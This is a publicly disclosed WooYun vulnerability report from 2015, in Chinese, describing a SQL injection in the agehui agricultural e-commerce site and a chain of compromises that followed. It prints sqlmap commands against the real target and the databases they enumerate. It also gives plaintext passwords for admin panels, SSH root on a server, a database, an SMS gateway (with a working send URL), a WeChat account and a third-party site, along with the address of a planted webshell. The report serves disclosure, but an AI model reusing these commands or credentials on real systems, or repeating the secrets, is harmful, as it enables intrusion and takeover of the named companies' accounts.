当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151638

漏洞标题:阿哥汇官网一个SQL注射漏洞引发的一连串问题

相关厂商:北京士惠农业发展有限公司

漏洞作者: system-admin

提交时间:2015-11-10 10:26

修复时间:2015-12-26 09:58

公开时间:2015-12-26 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

互联网农资有点热。阿哥汇,一家服务农户的电子商城,官网www.agehui.com和www.agehui.cn均指向101.200.0.35,之前www.agehui.cn是指向103.41.54.112,这个IP打开后的首页现在仍是阿哥汇。阿哥汇属于北京士惠农业发展有限公司。此SQL注射漏洞首先导致官网101.200.0.35数据库沦陷后台被登录。用成功登录后台的账户可以访问该用户的邮箱,领导邮箱里存了不少密码,包括智联招聘账号、微信公共平台账号、奥瑞金公司官网账号等等。用该账户成功登录103.41.54.112的ssh远程。103.42.54.112虽然废弃不用了但并没清空网站文件,可以看到二次开发后的ecshop代码和短信验证码平台账号。士惠农业发展有限公司www.agrite.com.cn dede程序存漏洞请自查。

详细说明:

python sqlmap.py -u "http://business.agehui.cn/find/seed/index?type_id=1*" --dbs
available databases [10]:
[*] agehui_db
[*] agridb
[*] aksexpert
[*] es_2117
[*] es_new
[*] experts
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
python sqlmap.py -u "http://business.agehui.cn/find/seed/index?type_id=1*" --current-db
current database: 'agehui_db'
python sqlmap.py -u "http://business.agehui.cn/find/seed/index?type_id=1*" -D agehui_db --tables

QQ截图20151103231842.png


230个表。
ecshop系统,直接找ecs_admin_user

QQ截图20151103232911.png


经解密dingwen 密码flying00 邮箱zhangdingwen@agrite.com.cn,请自行更改吧
成功登陆101.200.0.35后台

houtai.png


ssh -l dingwen 103.41.54.112 密码同上 成功登陆 root权限

ssh.png


可以看到二次开发后的网站文件仍在,根目录下还有es.sql index.php_old这些小毛病
通过/home/www/shop的user.php可以看到短信验证码平台接口账户密码OperID=shfz&OperPass=shfz33,经验证是正确可用的

sms.png


测试短信接口http://221.179.180.158:9007/QxtSms/QxtFirewall?OperID=shfz&OperPass=shfz33&SendTime=&ValidTime=&AppendID=&DesMobile=你的手机号&Content=wooyun&ContentType=15成功收到短信息,可群发单发
zhangdingwen@agrite.com.cn登录

mail.png


邮箱里面有不少信息
其中奥瑞金官网密码经验证可用
http://www.originseed.com.cn/webadmin/
管理员zdw 密码shihui@origin
数据库账号密码:root/ cjchnws.1
服务器:root/zgyfjch@2013
留给wooyun一个shell地址以便验证:http://www.originseed.com.cn/template/product/miniUpload.php
而且这个网站https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/file可遍历,可见里面有个php webshell
智联招聘

1111.png


阿哥汇专家系统
http://business.agehui.com/admin/login
这个忘了记录了,是有这个密码的(不想再翻一遍邮件了)
微信公共平台
用户agehui@agrite.com.cn
密码shny@agehui

QQ截图20151104001241.png


漏洞证明:

见详细说明,有图有真相

修复方案:

让公司的IT人员针对上述问题解决下吧
不知道服务器101.200.0.35的root密码是不是就是ecshop管理员中的某个密码,有cmd5付费账号的可以试一下,账户songtao的ec_salt为空

QQ截图20151103232911.png

版权声明:转载请注明来源 system-admin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-11 09:57

厂商回复:

谢谢白帽子的共享精神

最新状态:

暂无


漏洞评价:

评价